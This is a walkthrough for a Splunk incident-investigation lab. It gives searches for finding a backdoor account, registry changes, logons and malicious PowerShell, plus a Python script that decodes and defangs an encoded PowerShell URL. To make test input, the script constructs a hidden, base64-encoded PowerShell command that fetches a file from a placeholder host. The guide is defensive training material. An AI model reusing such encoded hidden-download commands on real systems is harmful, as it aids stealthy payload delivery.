Investigating

  1. How many events were collected and Ingested in the index main?

    1. index=main (SPL field names are lowercase and case-sensitive; the event count Splunk reports for this search is the answer)

  2. On one of the infected hosts, the adversary was successful in creating a backdoor user. What is the new username?

    1. index=main EventID=4720

      1. Check the "Account Name" field under "New Account" (EventID 4720 = "A user account was created"; the Account Name under Subject is the account that did the creating, not the new one)

  3. On the same host, a registry key was also updated regarding the new backdoor user. What is the full path of that registry key?

    1. index=main A1berto EventID=12

      1. Check the TargetObject field (Sysmon EventID 12 = registry object created or deleted; TargetObject holds the full key path)

  4. Examine the logs and identify the user that the adversary was trying to impersonate.

    1. Compare the backdoor username with the legitimate account names present in the logs

  5. What is the command used to add a backdoor user from a remote computer?

    1. index=main A1berto

      1. Check the CommandLine field of the process-creation events (Sysmon EventID 1) for the command that adds the user

  6. How many times was the login attempt from the backdoor user observed during the investigation?

    1. Search for the backdoor username and filter on the logon EventIDs:

      1. 4624 (an account was successfully logged on)

      2. 4625 (an account failed to log on)

    2. Count the matching events

  7. What is the name of the infected host on which suspicious Powershell commands were executed?

    1. index=main Channel="Windows PowerShell"

      1. Check for:

        1. HostApplication (the powershell.exe command line that was run)

        2. Hostname

  8. PowerShell logging is enabled on this device. How many events were logged for the malicious PowerShell execution?

    1. index=main Channel="Microsoft-Windows-PowerShell/Operational" (count the events returned; this channel holds script block logging, EventID 4104, and module logging, EventID 4103)

  9. An encoded Powershell script from the infected host initiated a web request. What is the full URL?

    1. Find the encoded PowerShell script (typically the base64 blob passed to powershell.exe with -EncodedCommand or -enc)

    2. Decode it (base64, then UTF-16LE) and locate the URL, which is itself encoded inside the decoded script

    3. Decode the URL

    4. Defang the URL with CyberChef's "Defang URL" operation (http becomes hxxp, :// becomes [://], each dot becomes [.])
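The four steps above, scripted end to end. This is an added example, not part of the original notes or the room's data: it assumes the outer layer is a standard `-EncodedCommand` blob (base64 over UTF-16LE) and that the URL inside the decoded script is base64 too; the command line it works on is constructed by `build_sample_cmdline` and the URL in it is a placeholder, not the task's answer.

```python
import base64
import binascii
import re

# -EncodedCommand and its accepted abbreviations (-e, -ec, -en, -enc, ...)
# followed by the base64 blob, as it appears in a Sysmon CommandLine field.
ENCODED_CMD_RE = re.compile(
    r"-e(?:c|n|nc|nco|ncod|ncode|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)
# Any run that looks like a base64 blob worth trying as a second layer.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>()]+")


def decode_encoded_command(cmdline):
    """Recover the script from a powershell.exe -EncodedCommand command line.
    -EncodedCommand carries base64 over the UTF-16LE bytes of the script."""
    m = ENCODED_CMD_RE.search(cmdline)
    if not m:
        raise ValueError("no -EncodedCommand argument found")
    return base64.b64decode(m.group(1)).decode("utf-16le")


def extract_urls(script):
    """Collect URLs written literally in the script or hidden inside any
    base64 blob embedded in it (assumption: the inner layer is base64 text)."""
    found = set(URL_RE.findall(script))
    for blob in B64_RE.findall(script):
        try:
            inner = base64.b64decode(blob, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # an identifier that merely looks like base64, or binary
        found.update(URL_RE.findall(inner))
    return sorted(found)


def defang(url):
    """Same transformation as CyberChef's "Defang URL": http -> hxxp,
    :// -> [://], . -> [.] so the indicator cannot be clicked by accident."""
    return url.replace("http", "hxxp").replace("://", "[://]").replace(".", "[.]")


def defanged_urls_from_cmdline(cmdline):
    """Steps 1-4 of the task in one call: decode, find, decode, defang."""
    return [defang(u) for u in extract_urls(decode_encoded_command(cmdline))]


def build_sample_cmdline(url):
    """Constructed demo evidence with the same shape as the task describes:
    the URL is base64-encoded inside the script, and the script is
    UTF-16LE + base64 encoded for -EncodedCommand. Not the room's logs."""
    inner = base64.b64encode(url.encode("utf-8")).decode("ascii")
    script = (
        "$u=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
        + inner + "'));Invoke-WebRequest -Uri $u"
    )
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return "powershell.exe -NoP -W Hidden -Enc " + blob


if __name__ == "__main__":
    sample = build_sample_cmdline("http://example.invalid/update.ps1")
    print(decode_encoded_command(sample))
    print(defanged_urls_from_cmdline(sample))
```

In practice, paste the CommandLine value from the Splunk event into `defanged_urls_from_cmdline`; if the inner layer is not base64 (reversed string, hex, XOR), `extract_urls` will only return URLs written literally, which is your cue to look at how the decoded script builds the string.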

Task № 9 is extremely easy.

Don't overthink it.

I wasted 4 days before realizing how easy it was.
